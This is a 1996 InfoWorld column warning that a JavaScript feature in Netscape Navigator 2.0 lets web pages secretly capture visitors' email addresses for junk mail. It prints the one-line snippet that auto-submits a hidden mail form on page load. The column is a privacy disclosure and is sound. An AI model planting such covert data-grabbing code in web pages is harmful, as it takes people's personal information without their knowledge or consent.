March 4, 1996
How Java Script uses the Web to scam your E-mail
Java Script, the new scripting language supported by Internet browsers such as Netscape Communications Corp.'s Navigator 2.0, provides a command that can be used to secretly obtain your E-mail address whenever you merely look at a page on the World Wide Web.
With little more than a single line of code, Web site administrators can quietly obtain all the information they need to begin sending you quantities of junk E-mail. The implications for personal privacy -- always a concern on the wide-open Internet -- need to be seriously considered by the computer industry.
A warning about this problem has been sounded by Glenn Fleishman of the Point of Presence Co. (Popco), in Seattle. Popco is a Web site developer and "content-hosting service" that creates Web pages.
Fleishman has created a Web page that illustrates the problem. When you set your browser to view the following page, http://www.popco.com/grabtest.html, the site automatically retrieves your E-mail address from any properly configured Netscape Navigator or compatible browser.
Sure enough, when I visited this site, I received a confirming E-mail message within minutes.
The Java Script command that accomplishes this bit of scamming is simplicity itself. As part of the body of any Web page, the command causes a blank E-mail message, using a dummy "mailme" form, to be sent:
<BODY onLoad="document.mailme.submit()">
This transmits information for the Web provider to capture your E-mail address, which is part of the blank message's header.
You may think I'm revealing some horrible secret that would be better left unsaid. You can rest assured that this new feature has been a hot topic on the Internet Marketing Discussion List (http://www.i-m.com), a dialogue on ways to use the 'net to reach customers.
Of the 6,500 or so recipients of the marketing list, more than 750 addresses of visitors have already been recorded by Fleishman's demo page. And that's only in the five days that the page has been available (as of press time). Using Navigator, anyone can click View, Document Source and save a copy of the 10 lines of sample code Fleishman has developed. The word is out.
Of course, it's easy to defeat this little piece of code. Your E-mail information is derived from the user configuration file maintained by Navigator and other browser software. When you set up Navigator 2.0, it asks you to enter this information so you can send E-mail messages during your Web surfing. (Some browsers, including Microsoft Internet Explorer 2.0, don't yet support these features, so the "onLoad" command does nothing.) If you enter a bogus E-mail address or mail-server name in your configuration, the "onLoad" command is beaten. Unfortunately, using bogus data interferes with your legitimate E-mail use, so it's not the best solution.
In my opinion, it is unethical for commercial entities to collect personal information without informing the affected persons and allowing them to decide whether or not to submit it. Fleishman has done us a service by bringing this capability to our attention, so the computer industry can develop guidelines for privacy. This is a situation where self-regulation would help prevent more heavy-handed governmental intervention.
Glenn Fleishman receives a free copy of Windows 95 Secrets for sending me a tip about this development.
Brian Livingston is the coauthor of the new Windows 95 Secrets and author of three other Windows books (IDG Books). Send tips to brian_livingston@infoworld.com or fax: (206) 282-1248.
Missed a column? Go back for more.
Copyright © 1996 by InfoWorld Publishing Company